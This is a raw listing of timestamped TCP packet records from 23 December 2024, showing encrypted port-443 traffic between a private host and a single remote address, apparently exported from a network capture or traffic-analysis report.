                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.278426886 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291644096 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291672945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291728973 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291743994 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291834116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291850090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291863918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291878939 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291954041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.291968107 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.292268991 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.327356100 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.369613886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.376195908 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.376389980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.376513004 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.376528978 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.376571894 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.377036095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.377053022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.377067089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.377087116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.377100945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.404243946 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.418118954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424330950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424644947 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424854994 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424911022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424926996 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.424968958 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425023079 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425039053 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425054073 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425287962 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425323009 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.425380945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.428045034 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.430237055 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441342115 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441361904 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441442966 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441458941 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441540003 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441569090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441641092 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441662073 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441677094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.441759109 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.442065001 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.453430891 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454216957 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454349041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454400063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454415083 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454480886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454505920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454521894 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454536915 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.454602003 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.455792904 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.456415892 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461222887 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461304903 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461352110 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461365938 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461395979 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461432934 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461627960 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.461888075 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.462016106 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469111919 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469399929 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469476938 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469515085 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469530106 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469573021 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469588041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469604015 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469609022 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469782114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469796896 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469810963 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469825983 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469841003 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.469858885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.470149040 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.475246906 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.476483107 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.483589888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.483839989 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.483855963 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.483871937 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.483961105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.485771894 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.499032974 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.516524076 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.531337023 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.539778948 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.539778948 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.541359901 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.542480946 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.570641994 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.641618013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646393061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646712065 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646735907 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646752119 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646814108 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.646943092 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.675211906 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.715414047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.761589050 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.762341022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.790901899 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.808348894 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.829900026 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.845402002 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.851706982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.851910114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.851970911 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.852015018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.852057934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.852080107 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.852092981 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.853848934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.853862047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.856489897 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.859769106 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.860075951 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861031055 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861118078 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861133099 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861191988 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861206055 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861219883 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861227989 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861350060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861365080 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861382961 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.861618996 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.864883900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.875772953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.875833035 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.875911951 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.875927925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876061916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876076937 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876092911 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876107931 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876132011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876195908 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876349926 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.876991987 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877018929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877043009 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877182007 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877197027 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877212048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877228975 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877244949 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877331018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877346992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.877724886 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886440992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886457920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886483908 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886498928 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886514902 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886534929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.886811018 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.912893057 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.920499086 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:15.985630035 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.076633930 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081058979 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081461906 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081685066 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081701994 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081727982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081743002 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081758976 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081773043 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081789017 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.081985950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.082000971 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.082016945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.082889080 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090343952 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090379953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090396881 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090411901 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090428114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090442896 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090460062 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090609074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090626001 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090643883 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.090830088 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.114897966 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.170855999 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.176691055 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.176872015 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.176959038 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177391052 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177407980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177423954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177448988 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177474022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177491903 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177510023 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177685976 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.177701950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.178179979 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.185815096 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.188297987 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.217729092 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.237934113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.242928982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.242945910 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.242966890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.242978096 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.243280888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.243773937 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.251703024 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.314280033 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.314505100 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.317809105 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.421427965 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.429533958 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435153008 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435210943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435331106 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435343981 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435359001 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435369015 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.435524940 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.446208000 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.503576040 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.509790897 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.509943962 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.509967089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.509979010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.510076046 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.510286093 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.513967037 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.566186905 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.572734118 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573016882 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573156118 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573174000 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573204994 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573453903 CET44352290104.70.121.51192.168.2.6
